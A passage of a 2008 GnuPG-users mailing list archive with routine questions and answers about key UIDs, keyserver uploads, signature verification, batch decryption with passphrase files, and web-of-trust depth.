le5ts0dy6KZfuIA/eT7tG5FYBci0Ab2fOolp+DKNXs5dZEnbOnDI6aI+Mv/fGeHB X09RafVlIqEnYtFnKy6j0hjx0o0+YRSy0i8lbwBYkSzWeQxil/fpM6tLQUXIXdpO dx++tPVs41jvzYmLb16h7LNNWpNFZhdzABr46+aB5qHTxJkik6ak4jGJTHhJnyAP ZCQiqmNHDNxtK5zARTlRFFHyp/9MlbwpwZyd5m6aLAkcCZxJIN4DDKTaNKg+pmE= =xGpQ -----END PGP SIGNATURE----- On Wed, Jun 4, 2008 at 8:20 PM, Carlos Williams wrote: > On Wed, Jun 4, 2008 at 2:09 PM, Arnaud Ongenae wrote: > >> Do you see my signature (or from other person on this list) in Thunderbird ??? > > I am not using this email on Mozilla Thunderbird. I am strictly using > the web mail aspect of Gmail on this account. I am testing this out on > a separate account. > From phil-gpg at tinsleyviaduct.com Wed Jun 4 20:23:00 2008 From: phil-gpg at tinsleyviaduct.com (Phil Reynolds) Date: Wed, 4 Jun 2008 19:23:00 +0100 Subject: Wildcards in uids? In-Reply-To: <20080604170840.GB5992@jabberwocky.com> References: <20080604161300.esjouxce7r44c8o4@topdeck.tinsleyviaduct.com> <20080604170840.GB5992@jabberwocky.com> Message-ID: <20080604182300.GA8245@tinsleyviaduct.com> On Wed, Jun 04, 2008 at 01:08:40PM -0400, David Shaw wrote: > On Wed, Jun 04, 2008 at 04:13:00PM +0100, Phil Reynolds wrote: > > > > I have recently started using suffixed e-mail addresses and am wondering > > if I might need to add suffixes I am using to my key - or if I can add > > something that would catch them all. > > > > If I need to add them individually, it may be better to add the ones I > > need to as I need them, but if a catch-all is possible, please advise me > > as to how I need to specify it. > > Sorry, there is no way within GnuPG to do such a thing. It's > frequently doable outside of GnuPG via your mail program, but you'd > have to consult the documentation for that program to learn how. I think you may have misunderstood the query. I use suffixed e-mail addresses - I introduced them to help me sort mail as well as spot the leaky organisations. That part is absolutely working. However, do I need to add these addresses as uids to my key if I wish to sign or encrypt mail where I am using them as From: addresses? Is a "catch all suffixes" uid possible if that is the case? If so, how do I specify it? It is nothing, as far as I can see, to do with my mail programs (either of them). It is more to do with key administration. If not, presumably I simply sign/decrypt using my existing key? -- Phil Reynolds o ____ mail: phil-gpg at tinsleyviaduct.com |L_ \ / Web: http://www.tinsleyviaduct.com/phil/ (_)- \/ Waltham 66, Emley Moor 69, Droitwich 79, Windows 95 From dshaw at jabberwocky.com Wed Jun 4 21:18:00 2008 From: dshaw at jabberwocky.com (David Shaw) Date: Wed, 4 Jun 2008 15:18:00 -0400 Subject: Wildcards in uids? In-Reply-To: <20080604182300.GA8245@tinsleyviaduct.com> References: <20080604161300.esjouxce7r44c8o4@topdeck.tinsleyviaduct.com> <20080604170840.GB5992@jabberwocky.com> <20080604182300.GA8245@tinsleyviaduct.com> Message-ID: <20080604191800.GC5992@jabberwocky.com> On Wed, Jun 04, 2008 at 07:23:00PM +0100, Phil Reynolds wrote: > On Wed, Jun 04, 2008 at 01:08:40PM -0400, David Shaw wrote: > > On Wed, Jun 04, 2008 at 04:13:00PM +0100, Phil Reynolds wrote: > > > > > > I have recently started using suffixed e-mail addresses and am wondering > > > if I might need to add suffixes I am using to my key - or if I can add > > > something that would catch them all. > > > > > > If I need to add them individually, it may be better to add the ones I > > > need to as I need them, but if a catch-all is possible, please advise me > > > as to how I need to specify it. > > > > Sorry, there is no way within GnuPG to do such a thing. It's > > frequently doable outside of GnuPG via your mail program, but you'd > > have to consult the documentation for that program to learn how. > > I think you may have misunderstood the query. > > I use suffixed e-mail addresses - I introduced them to help me sort mail > as well as spot the leaky organisations. That part is absolutely > working. > > However, do I need to add these addresses as uids to my key if I wish to > sign or encrypt mail where I am using them as From: addresses? > > Is a "catch all suffixes" uid possible if that is the case? If so, how do > I specify it? It is nothing, as far as I can see, to do with my mail > programs (either of them). It is more to do with key administration. I think I did understand the query. You have email addresses like "myaddress-foo at example.com", "myaddress-bar at example.com", and so on. The question was is a "catch all suffixes" UID possible. The answer to that question is no. That said, I'm not sure why you think this is a necessary thing to do. David From faramir.cl at gmail.com Wed Jun 4 21:58:49 2008 From: faramir.cl at gmail.com (Faramir) Date: Wed, 04 Jun 2008 15:58:49 -0400 Subject: Incompatibility between GnuPG encryption and the Bouncy Castle encryption. In-Reply-To: <62fd3c0a0806040200u7e6fd86bme4059ec1b2ceeb54@mail.gmail.com> References: <62fd3c0a0806040200u7e6fd86bme4059ec1b2ceeb54@mail.gmail.com> Message-ID: <4846F3F9.8040608@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Bhushan Jain escribi?: > Hi, > > I have created RSA key as well as its subkey for encryption using GnuPG. > Now I encrypted a file using JAVA library functions given by Bouncy > Castle (a pgp library in JAVA which claims to adhere to rfc 2440). I > also encrypted the same file using the GnuPG commands from command line. > The following are the results of the pgpdump for both of them........... ... > Plz help me ..... > or is it that GnuPG donot follow the rfc2440?? All I know about this is GnuPG can be set to different compatibility modes, like: openpgp, pgp2, pgp8, rfc1991, rfc2440, rfc4880, and some others. Reading GnuPG manual, it states: "INTEROPERABILITY GnuPG tries to be a very flexible implementation of the OpenPGP standard. In particular, GnuPG implements many of the optional parts of the standard, such as the SHA-512 hash, and the ZLIB and BZIP2 compression algorithms. It is important to be aware that not all OpenPGP programs implement these optional algorithms and that by forcing their use via the --cipher-algo, --digest-algo, - --cert-digest-algo, or --compress-algo options in GnuPG, it is possible to create a perfectly valid OpenPGP message, but one that cannot be read by the intended recipient. There are dozens of variations of OpenPGP programs available, and each supports a slightly different subset of these optional algorithms. For example, until recently, no (unhacked) version of PGP supported the BLOWFISH cipher algorithm. A message using BLOWFISH simply could not be read by a PGP user. By default, GnuPG uses the standard OpenPGP preferences system that will always do the right thing and create messages that are usable by all recipients, regardless of which OpenPGP program they use. Only override this safe default if you really know what you are doing. If you absolutely must override the safe default, or if the preferences on a given key are invalid for some reason, you are far better off using the --pgp6, --pgp7, or --pgp8 options. These options are safe as they do not force any particular algorithms in violation of OpenPGP, but rather reduce the available algorithms to a "PGP-safe" list." So, maybe the cipher algorithm you are using with GnuPG is not supported in rfc2440, and the solution would be to change the preferences settings to rfc2440 compatible. I hope this helps. Regards -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJIRvP5AAoJEMV4f6PvczxAozgH/3bFLpB1JXfCQZvBBXGOmvfh sFUWVRyo8AQlNx5A4lpl2m6IV36kMzJ3YWmgIeSCsoYmPtD2SswS82j1selIaz7n 2SoLLYjfsagHnREOaP4uqENySse/5Sz+cALMD3WJ7VHTtFWG1HanENVH1IdQBjwW AG8stUf0pfUef6mh8buqhRU5GfEO8uONnH6kB4nislcYVnfTH2JgVYz7OPGNqBc1 eS1owiKg3ycUh/WO2xAeshn0sp6Tv5Ch/zE1ibMymuswYHdFnNcQR0JM67XfAds0 1ZiLIV7qPiV+5BBhKHe7L2aywX0hnjWzUs/BEBoMBQc3UIEDrtmfbMOT8kv0Lro= =e1GL -----END PGP SIGNATURE----- From carloswill at gmail.com Thu Jun 5 00:12:25 2008 From: carloswill at gmail.com (Carlos Williams) Date: Wed, 04 Jun 2008 18:12:25 -0400 Subject: Am I Missing Something? In-Reply-To: <83713a650806041125h5bf5c694l36f7c6dacd04e38e@mail.gmail.com> References: <483EC791.7050100@mac.com> <483EFB33.1080607@bellsouth.net> <83713a650806041109i69c9dfffleef777e16e0e0723@mail.gmail.com> <83713a650806041125h5bf5c694l36f7c6dacd04e38e@mail.gmail.com> Message-ID: <48471349.4060908@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Arnaud Ongenae wrote: > You may give a try to FireGPG (an extension to Firefox) that allow to > use gpg in the Gmail interface... it's really easy > > http://getfiregpg.org/index.php?page=home&lang=en > > It will show if the mail are signed even if it's not your mail is not > configured for gpg so you will be able to see if gpp is well > configured, then we can try to find out other solution I think it may be working now. I tried everything over from scratch on my gmail account and it looks like it found me key. Is there a way to test this with you guys on the list? _______________________________________________ Gnupg-users mailing list Gnupg-users at gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIRxNJkox9aWcei0oRAlxrAJ4xlS1fGx4BCoEbyLS+9tM5bQN9XwCeLE/t xJPxlA2yD6oGctR1pkJjQeA= =La8n -----END PGP SIGNATURE----- From phil-gpg at tinsleyviaduct.com Thu Jun 5 00:59:10 2008 From: phil-gpg at tinsleyviaduct.com (Phil Reynolds) Date: Wed, 4 Jun 2008 23:59:10 +0100 Subject: Wildcards in uids? In-Reply-To: <20080604191800.GC5992@jabberwocky.com> References: <20080604161300.esjouxce7r44c8o4@topdeck.tinsleyviaduct.com> <20080604170840.GB5992@jabberwocky.com> <20080604182300.GA8245@tinsleyviaduct.com> <20080604191800.GC5992@jabberwocky.com> Message-ID: <20080604225909.GA28216@tinsleyviaduct.com> On Wed, Jun 04, 2008 at 03:18:00PM -0400, David Shaw wrote: > I think I did understand the query. You have email addresses like > "myaddress-foo at example.com", "myaddress-bar at example.com", and so on. > The question was is a "catch all suffixes" UID possible. The answer > to that question is no. > > That said, I'm not sure why you think this is a necessary thing to > do. Should I wish to sign, or should somebody wish to send me something encrypted, to some address with a suffix, my key will need a uid containing that suffix, as far as I can see. Therefore, should it prove necessary, I will presumably have to add such uids as necessary to the key. On the whole, I think this will probably only rarely, if ever, be needed. But, if it is, at least I know now. -- Phil Reynolds o ____ mail: phil-gpg at tinsleyviaduct.com |L_ \ / Web: http://www.tinsleyviaduct.com/phil/ (_)- \/ Waltham 66, Emley Moor 69, Droitwich 79, Windows 95 From reynt0 at cs.albany.edu Thu Jun 5 02:41:21 2008 From: reynt0 at cs.albany.edu (reynt0) Date: Wed, 4 Jun 2008 20:41:21 -0400 (EDT) Subject: Wildcards in uids? In-Reply-To: <20080604225909.GA28216@tinsleyviaduct.com> References: <20080604161300.esjouxce7r44c8o4@topdeck.tinsleyviaduct.com> <20080604170840.GB5992@jabberwocky.com> <20080604182300.GA8245@tinsleyviaduct.com> <20080604191800.GC5992@jabberwocky.com> <20080604225909.GA28216@tinsleyviaduct.com> Message-ID: On Wed, 4 Jun 2008, Phil Reynolds wrote: > On Wed, Jun 04, 2008 at 03:18:00PM -0400, David Shaw wrote: >> I think I did understand the query. You have email addresses like >> "myaddress-foo at example.com", "myaddress-bar at example.com", and so on. >> The question was is a "catch all suffixes" UID possible. The answer >> to that question is no. >> >> That said, I'm not sure why you think this is a necessary thing to >> do. FWIW, I would think you would want to separate signing as well as emailing, to as much as possible maintain isolation and confidentiality of whatever you are doing with those suffixed email addresses? From John at Mozilla-Enigmail.org Thu Jun 5 04:17:04 2008 From: John at Mozilla-Enigmail.org (John Clizbe) Date: Wed, 04 Jun 2008 21:17:04 -0500 Subject: Am I Missing Something? In-Reply-To: <48471349.4060908@gmail.com> References: <483EC791.7050100@mac.com> <483EFB33.1080607@bellsouth.net> <83713a650806041109i69c9dfffleef777e16e0e0723@mail.gmail.com> <83713a650806041125h5bf5c694l36f7c6dacd04e38e@mail.gmail.com> <48471349.4060908@gmail.com> Message-ID: <48474CA0.3090403@Mozilla-Enigmail.org> Carlos Williams wrote: > I think it may be working now. I tried everything over from scratch on > my gmail account and it looks like it found me key. Is there a way to > test this with you guys on the list? It /looks/ like Enigmail is working. Looks is the best anyone can tell at the moment. Had you sent your key to the keyservers, folks could've verified the signature you had on this last message. Until then, ie until it is available: 1) See if the original message in your Sent folder verifies OK 2a) Send yourself a signed message and see if that verifies when you receive it. 2b) You can also send yourself an encrypted message. Until your public key is available, there is nothing others can help you with -- John P. Clizbe Inet: John (a) Mozilla-Enigmail.org You can't spell fiasco without SCO. hkp://keyserver.gingerbear.net "what's the key to success?" / "two words: good decisions." "what's the key to good decisions?" / "one word: experience." "how do i get experience?" / "two words: bad decisions." "Just how do the residents of Haiku, Hawai'i hold conversations?" -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 677 bytes Desc: OpenPGP digital signature URL: From gukgukcommunity at yahoo.com Thu Jun 5 05:13:52 2008 From: gukgukcommunity at yahoo.com (guk guk) Date: Wed, 4 Jun 2008 20:13:52 -0700 (PDT) Subject: Automating Decryption using gpg --batch --passphrase-file or gpg --batch --passphrase-fd 0 Message-ID: <111106.32895.qm@web46001.mail.sp1.yahoo.com> Hi Hardeep! Thanks for your reply. I did try your suggestion and It didn't work. It still throwing the same error . Can you tell more about the key setup? What kind of procedure i need to follow so i can run gpg in SQL Job? Thanks ----- Original Message ---- From: Hardeep Singh To: guk guk Sent: Wednesday, June 4, 2008 6:27:09 PM Subject: Re: Automating Decryption using gpg --batch --passphrase-file or gpg --batch --passphrase-fd 0 Hi The first method is incorrect. Correct usage of --passphrase-fd is as below: gpg --batch --decrypt --passphrase-fd 0 --output output.csv output.csv.pgp wrote: > > Hi ! > > I tried to automate decryption of pgp files by running this command line in > windows xp > gpg --batch --passphrase-fd 0 < passphrase.txt --output "OUTPUT.CSV" > --decrypt "OUTPUT.CSV.pgp" > or > gpg --batch --passphrase-file passphrase.txt --output "OUTPUT.CSV" > --decrypt "OUTPUT.CSV.pgp" > > but it's always failed. > It always throw an error > gpg: encrypted with 2048-bit RSA key, ID , created 2008-05-08 > gpg: public key decryption failed: bad passphrase > gpg: decryption failed: secret key not available > > I'm using gnupg 1.4.9. > Can anybody help me please? > Thanks > > > > > > > _______________________________________________ > Gnupg-users mailing list > Gnupg-users at gnupg.org > http://lists.gnupg.org/mailman/listinfo/gnupg-users > > -- Hardeep Singh -------------- next part -------------- An HTML attachment was scrubbed... URL: From apple at royds.net Thu Jun 5 05:09:20 2008 From: apple at royds.net (Bill Royds) Date: Wed, 4 Jun 2008 23:09:20 -0400 Subject: Am I Missing Something? In-Reply-To: <48471349.4060908@gmail.com> References: <483EC791.7050100@mac.com> <483EFB33.1080607@bellsouth.net> <83713a650806041109i69c9dfffleef777e16e0e0723@mail.gmail.com> <83713a650806041125h5bf5c694l36f7c6dacd04e38e@mail.gmail.com> <48471349.4060908@gmail.com> Message-ID: <6DF21093-AF5A-4F7A-AC7E-5BF894597BD9@royds.net> On 4-Jun-08, at 18:12 , Carlos Williams wrote: > I think it may be working now. I tried everything over from scratch on > my gmail account and it looks like it found me key. Is there a way to > test this with you guys on the list? Your message was signed but your key does not seem to e in any public key server. You need to send it to a keyserver so others can use your public key. use gnupg2 --keyserver hkp://subkeys.pgp.net --send-keys [key IDs] Similar to--export but sends the keys to a keyserver. Fingerprints may be used instead of key IDs. Option--keyserver must be used to give the name of this keyserver. Don?t send your complete keyring to a keyserver --- select only those keys which are new or changed by you. From faramir.cl at gmail.com Thu Jun 5 06:21:51 2008 From: faramir.cl at gmail.com (Faramir) Date: Thu, 05 Jun 2008 00:21:51 -0400 Subject: Am I Missing Something? In-Reply-To: <6DF21093-AF5A-4F7A-AC7E-5BF894597BD9@royds.net> References: <483EC791.7050100@mac.com> <483EFB33.1080607@bellsouth.net> <83713a650806041109i69c9dfffleef777e16e0e0723@mail.gmail.com> <83713a650806041125h5bf5c694l36f7c6dacd04e38e@mail.gmail.com> <48471349.4060908@gmail.com> <6DF21093-AF5A-4F7A-AC7E-5BF894597BD9@royds.net> Message-ID: <484769DF.3000204@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Bill Royds escribi?: > > On 4-Jun-08, at 18:12 , Carlos Williams wrote: > >> I think it may be working now. I tried everything over from scratch on >> my gmail account and it looks like it found me key. Is there a way to >> test this with you guys on the list? > > Your message was signed but your key does not seem to e in any public > key server. You need to send it to a keyserver so others can use your > public key. > > use gnupg2 --keyserver hkp://subkeys.pgp.net --send-keys [key IDs] > > > Similar to--export but sends the keys to a keyserver. Fingerprints may > be used instead of key > IDs. Option--keyserver must be used to give the name of this keyserver. > Don?t send your complete > keyring to a keyserver --- select only those keys which are new or > changed by you. *IF* he is using enigmail, it would easier to open the key management window, right click the key, and select "upload to key server"... -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJIR2nfAAoJEMV4f6PvczxAzQgIAK3LAQViiENp1WpQFgLsyYHV Xls0GvKc9oFApgbj0Oe2fKGVHVuuoT87MRgUYnoW4Ot91k/KUY0oBkxlC9MmPQC9 HISd/lnhazhb+oQhNqS/V7P25gugRekOdZ/j5rVmNFk8RWoOciLfRIMUWkzK+1TU u6YQiUzcMdEZAIG51pBDau67Jutpw4eOjSLYO2FGhHQN6UMCQ0VTAbcTnqk8YiR7 kMKvjW7OzSpVJVrr3CKsrGoTRvIEy0/wlpufCatQpkLPJf3zqY0ydcsW3xl7dkyt gx8ZuYjtuDe8gz8Q7Sk4RK/e1mKFpxi9SdtdadsF32Diji3oFSq7UifG3QHv8+4= =wiKC -----END PGP SIGNATURE----- From John at Mozilla-Enigmail.org Thu Jun 5 06:35:06 2008 From: John at Mozilla-Enigmail.org (John Clizbe) Date: Wed, 04 Jun 2008 23:35:06 -0500 Subject: Automating Decryption using gpg --batch --passphrase-file or gpg --batch --passphrase-fd 0 In-Reply-To: <521129.96578.qm@web46014.mail.sp1.yahoo.com> References: <521129.96578.qm@web46014.mail.sp1.yahoo.com> Message-ID: <48476CFA.8080106@Mozilla-Enigmail.org> guk guk wrote: > I tried to automate decryption of pgp files by running this command line in > windows xp > gpg --batch --passphrase-fd 0 < passphrase.txt --output "OUTPUT.CSV" > --decrypt "OUTPUT.CSV.pgp" > or > gpg --batch --passphrase-file passphrase.txt --output "OUTPUT.CSV" > --decrypt "OUTPUT.CSV.pgp" The general form is gpg --batch --passphrase-file --output --decrypt The first is wrong gpg --batch --passphrase-fd 0 --output <> --decrypt <> < The second looks correct, the quotes around the filenames are generally unneeded on Win32, but shouldn't break things. > but it's always failed. It always throw an error > gpg: encrypted with 2048-bit RSA key, ID , created 2008-05-08 > gpg: public key decryption failed: bad passphrase The bad passphrase error points to your passphrase file being at fault. Check that your passphrase file is the same exact length as the passphrase. Use DIR at a command prompt or any program that will do a hex dump for you. A (hex 0x0d0a) at the end of the passphrase in the file will cause the passphrase to fail. (0x0a) alone seems to work as well as no line ending at all. notepad can be used to create the file without line endings. These problems go away by removing the passphrase from the key. And remove the charade that things are all that secure when the passphrase is in a file readable by anyone with enough access. -- John P. Clizbe Inet: John (a) Mozilla-Enigmail.org You can't spell fiasco without SCO. PGP/GPG KeyID: 0x608D2A10/0x18BB373A "what's the key to success?" / "two words: good decisions." "what's the key to good decisions?" / "one word: experience." "how do i get experience?" / "two words: bad decisions." "Just how do the residents of Haiku, Hawai'i hold conversations?" -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 677 bytes Desc: OpenPGP digital signature URL: From shavital at mac.com Thu Jun 5 08:02:42 2008 From: shavital at mac.com (Charly Avital) Date: Thu, 05 Jun 2008 02:02:42 -0400 Subject: Am I Missing Something? In-Reply-To: <48471349.4060908@gmail.com> References: <483EC791.7050100@mac.com> <483EFB33.1080607@bellsouth.net> <83713a650806041109i69c9dfffleef777e16e0e0723@mail.gmail.com> <83713a650806041125h5bf5c694l36f7c6dacd04e38e@mail.gmail.com> <48471349.4060908@gmail.com> Message-ID: <48478182.2090106@mac.com> Carlos Williams wrote the following on 6/4/08 6:12 PM: [...] > I think it may be working now. I tried everything over from scratch on > my gmail account and it looks like it found me key. Is there a way to > test this with you guys on the list? Carlos, As you have already been answered by John, your e-mail looks like a signed one, and an attempt to verify the signature outputs: gpg: Signature made Wed Jun 4 18:12:25 2008 EDT using DSA key ID 671E8B4A gpg: requesting key 671E8B4A from hkp server keyserver.linux.it gpg: no valid OpenPGP data found. gpg: Total number processed: 0 gpg: Can't check signature: No public key I have tried to find your key on key servers other than the one indicated above, without results. The only key I have found who is listed to someone named carlos williams is: carlos williams 1024 bit DSA key 8C73D5AB, created: 1997-08-27 That's not the key used to sign your message. If you want recipients of your signed e-mails to be able to verify your signature, you should upload your public key to a public server, or to send your key directly and exclusively to your selected correspondents. In the present case, this is a mailing list, so either you upload you key to a keyserver, or you attach your public key (OpenPGP/Attach My Public Key) to a message posted to the list, which will leave out people who are not subscribed to this list. Best regards, Charly MacOS 10.5.3 - MacBook Intel C2Duo - GnuPG 1.4.9 - GPG2 2.0.9 - Thunderbird 2.0.0.14 - Enigmail 0.96a From JPClizbe at tx.rr.com Thu Jun 5 09:04:59 2008 From: JPClizbe at tx.rr.com (John Clizbe) Date: Thu, 05 Jun 2008 02:04:59 -0500 Subject: Am I Missing Something? In-Reply-To: <48478182.2090106@mac.com> References: <483EC791.7050100@mac.com> <483EFB33.1080607@bellsouth.net> <83713a650806041109i69c9dfffleef777e16e0e0723@mail.gmail.com> <83713a650806041125h5bf5c694l36f7c6dacd04e38e@mail.gmail.com> <48471349.4060908@gmail.com> <48478182.2090106@mac.com> Message-ID: <4847901B.9060908@tx.rr.com> Charly Avital wrote: > If you want recipients of your signed e-mails to be able to verify your > signature, you should upload your public key to a public server, or to > send your key directly and exclusively to your selected correspondents. > > In the present case, this is a mailing list, so either you upload you > key to a keyserver, or you attach your public key (OpenPGP/Attach My > Public Key) to a message posted to the list, which will leave out people > who are not subscribed to this list. The bandwidth-friendly solution is to use the keyservers. Then those who wish to verify your signature or send you encrypted traffic can retrieve it. -- John P. Clizbe Inet: JPClizbe (a) tx DAWT rr DAHT con Ginger Bear Networks hkp://keyserver.gingerbear.net "Be who you are and say what you feel because those who mind don't matter and those who matter don't mind." - Dr Seuss, "Oh the Places You'll Go" -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 677 bytes Desc: OpenPGP digital signature URL: From ml at mareichelt.de Thu Jun 5 09:38:54 2008 From: ml at mareichelt.de (markus reichelt) Date: Thu, 05 Jun 2008 09:38:54 +0200 Subject: problem with forgotten passphrase, no revocation certificate available. In-Reply-To: <48457AE0.7050705@gmail.com> References: <4843CFFB.1060401@gmail.com> <48457AE0.7050705@gmail.com> Message-ID: <20080605073854.GF4162@tatooine.rebelbase.local> * Faramir wrote: > > So, here is the question: Can that public key cause problems, > > if I associate another key with the same email account? > I have good news (good for me at least): I checked the gpg > installed in my USB flash memory, and I found the private key (or > at least, the private subkeys for that key), and since I had not > forgotten that passphrase, I could revoke the key. well, next time give http://www.vanheusden.com/nasty/ a chance ;p > Anyway, I still would like to know the answers for these > questions... Nope, cos it's about key IDs, not about email addressed used. -- left blank, right bald -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: not available URL: From sickuser at gmail.com Tue Jun 3 21:20:34 2008 From: sickuser at gmail.com (gabrix) Date: Tue, 3 Jun 2008 21:20:34 +0200 Subject: No public key to verify signature Message-ID: <200806032120.42778.gabrix@gabrix.ath.cx> I run debian etch and kmail is my mail application. All mail i get signed by gnupg coming from mailing lists , has this error: "Message was signed on 2008-06-03 14:15 with unknown key 0x123456789ABCDFGH. The validity of the signature cannot be verified. Status: No public key to verify the signature" It doesn't happen with other mail coming from my contacts or friends i was wondering what it was due this error , thanks -- ####################################################################### Email: root at gabrix.ath.cx MSN: sickuser at gmail.com Ekiga: gabrihell at ekiga.net Skype: gabx666 jabber: gabrihell at jabber.linux.it My Gnupg pub key : https://www.gabrix.ath.cx/mynewpubkey.asc -------------------------------------------------------------- sec 1024D/6C71F528 2008-03-18 Key fingerprint = AD40 8FC1 F8C0 60E1 608E C136 8080 9773 6C71 F528 uid Gabriele (PRIMA NUOVA SERIE) ssb 4096g/63E0E427 2008-03-18 ------------------------------------------------------------------------ | .''`. ** Debian GNU/Linux ** Gabriele S. | : :' : The universal https://www.gabrix.ath.cx/ | `. `' Operating System | `- http://www.debian.org/ -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available URL: From aongenae at gmail.com Thu Jun 5 22:52:36 2008 From: aongenae at gmail.com (Arnaud Ongenae) Date: Thu, 5 Jun 2008 22:52:36 +0200 Subject: No public key to verify signature In-Reply-To: <200806032120.42778.gabrix@gabrix.ath.cx> References: <200806032120.42778.gabrix@gabrix.ath.cx> Message-ID: <83713a650806051352k18c56cdi1b4f0c202a96e8bf@mail.gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 2008/6/3 gabrix : > I run debian etch and kmail is my mail application. > All mail i get signed by gnupg coming from mailing lists , has this error: > > "Message was signed on 2008-06-03 14:15 with unknown key 0x123456789ABCDFGH. > The validity of the signature cannot be verified. > Status: No public key to verify the signature" with this error, I suppose that your system don't know our signature. You have to retrieve them from keyserver. > > It doesn't happen with other mail coming from my contacts or friends i was > wondering what it was due this error , thanks I guess that you have imported your friend's signature, don't you ? > -- > ####################################################################### > Email: root at gabrix.ath.cx > > MSN: sickuser at gmail.com > > Ekiga: gabrihell at ekiga.net > > Skype: gabx666 > > jabber: gabrihell at jabber.linux.it > > > > My Gnupg pub key : https://www.gabrix.ath.cx/mynewpubkey.asc > -------------------------------------------------------------- > sec 1024D/6C71F528 2008-03-18 > Key fingerprint = AD40 8FC1 F8C0 60E1 608E C136 8080 9773 6C71 > F528 > uid Gabriele (PRIMA NUOVA SERIE) > ssb 4096g/63E0E427 2008-03-18 > > > > ------------------------------------------------------------------------ > | .''`. ** Debian GNU/Linux ** > Gabriele S. | : :' : The universal > https://www.gabrix.ath.cx/ | `. `' Operating System > | `- http://www.debian.org/ > > > _______________________________________________ > Gnupg-users mailing list > Gnupg-users at gnupg.org > http://lists.gnupg.org/mailman/listinfo/gnupg-users > > Is your mail client configured to retrieve automatically key on keyserver ? I don't know for Kmail but I think that this kind of feature existe on other mail client... _-Arnaud-_ -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.7 (GNU/Linux) Comment: http://getfiregpg.org iQEcBAEBAgAGBQJISFIPAAoJEFgy9SDyxO8hKz4H/A5pq0MeFk1JVf8D243NB/QV dtaPgM5ITfLL82wHGbvMclEzmhLrXek34IX7D3Xw9OQ5Bvf171DV2bn0qefR7I8D YrtSzYBzQ0or/8VRk7/WzqG563TOs9S6rh6thaKuRsaWQDMjnpFIkwjanERf+Tno JFihxNOKmMGs4R1sCMkkR898YpGk7jltnrjOV4lhPDl5VqGBf7xiZU/qxsp4SQ97 5B5FIGB1k7gw9QycJ6DVXXgUggX0laon4LDUVkD6ZmMRKzmbkEkqp8KbAvOFJs4k ZgXDfBzhRuwrybDvqr8okbv6iT5ZtYwqdDf6HJrYgaEIGN2ekJHyVZnWwIQ+KvU= =T6dA -----END PGP SIGNATURE----- From george.davidescu at gmail.com Fri Jun 6 22:26:19 2008 From: george.davidescu at gmail.com (bezna) Date: Fri, 6 Jun 2008 13:26:19 -0700 (PDT) Subject: max-cert-depth and "chains of trust" in GPG Message-ID: <17700504.post@talk.nabble.com> I'm a bit confused as to how trust is handled in GPG, or maybe PGP in general. It seems to me that it is impossible to establish long chains of trust in GPG, because trust databases are kept hidden from other users and ownertrust values have to be set by the user himself; as a result of this the maximum depth of a "chain of trust" seems to be 2: the owner (depth 0), his trusted introducer (depth 1) and the person whose certificate is validated by the trusted introducer (depth 1). When I got into GPG I was under the impression that you could rely on long "chains of trust" or chains of trusted introducers in order to validate a certificate at the end of the chain. However, as Abdul-Rahman points out (http://www.wim.uni-koeln.de/uploads/media/The_PGP_Trust_Model.pdf), this does not seem to be the case. Let me illustrate with an example. Say Alice signs Bob's key, and Bob signs Charlie's key. Now say Alice fully trusts Bob. Suppose also that Bob fully trusts Charlie. Because of her trust in Bob, Charlie's certificate appears valid to Alice. The chain might look something like this (note that the arrow represents both a valid signature and full trust given by the person from whom the arrow originates to the person at the tip of the arrow). A --> B --> C Depth: 0 1 2 Valid: y y y Recall that Bob fully trusts Charlie. Now suppose Charlie had signed Dale's certificate. In theory, this could lead to the establishment of a "chain of trust" where Dale's certificate appears valid to Alice, who trusts Bob's competence in assessing the authenticity of a certificate, who in turn trusts Charlie, who vetted and signed Dale's certificate. How trustworthyess should be computed as we progress down such a chain is another issue. A--> B--> C--> D Depth: 0 1 2 3 Valid: y y y y However, this does not happen in GPG. Because Alice does not have access to Bob's trust database (unless he exports it and gives it to her), she has no way of knowing who Bob trusts and to what extent. Thus, she can only rely on the signatures made by Bob himself to determine if a certificate is valid, but not Bob's trusted introducers because she has no idea who they are. A--> B--> C--> D Depth: 0 1 2 3 Valid: y y y ? A workaround to this problem is for Alice to fully trust Charlie (who appears valid to her because of Bob's signature) as an introducer, thereby validating Dale's certificate through him. Note that Alice doesn't need to sign Dale's certificate herself to do this. The next illustration shows the situation from Alice's perspective only (IE she has no access to who the other players trust). --> arrows represent both a signature and full trust, while ==> arrows represent only signatures. A--> B \ || | v ---> C==> D Bob's certificate appears valid to Alice because she signed it. Charlie's certificate is validated because she trusts Bob and Bob signed Charlie's key. Dale's certificate is validated because she trusts Charlie and Charlie has signed Dale's key. Note that the graph tracing the signatures the players have made is different from the above graph of Alice's trust database, keeping in mind that Alice signed Bob, Bob signed Charlie and Charlie signed Dale: A==> B==> C==> D Depth: 0 1 2 3 So for Alice to be able to validate a certificate through someone else's signature, she has to personally trust that someone else; the trust can't transfer through an intermediate. Ok, now, after all this, which I hope you understood, come the questions. Am I understanding this correctly? Can "chains of trust" have only a depth of one (Alice and the person she trusts) or is there something more? What does the max-cert-depth parameter refer to? Is that the depth of the "chain of signatures"? And lastly, how do all these sites and applications that trace a path between your certificate and another person's certificate work? Based on tracing signatures alone? Is it possible to export your trust database to these servers so they will aggregate it into one and take trust as well 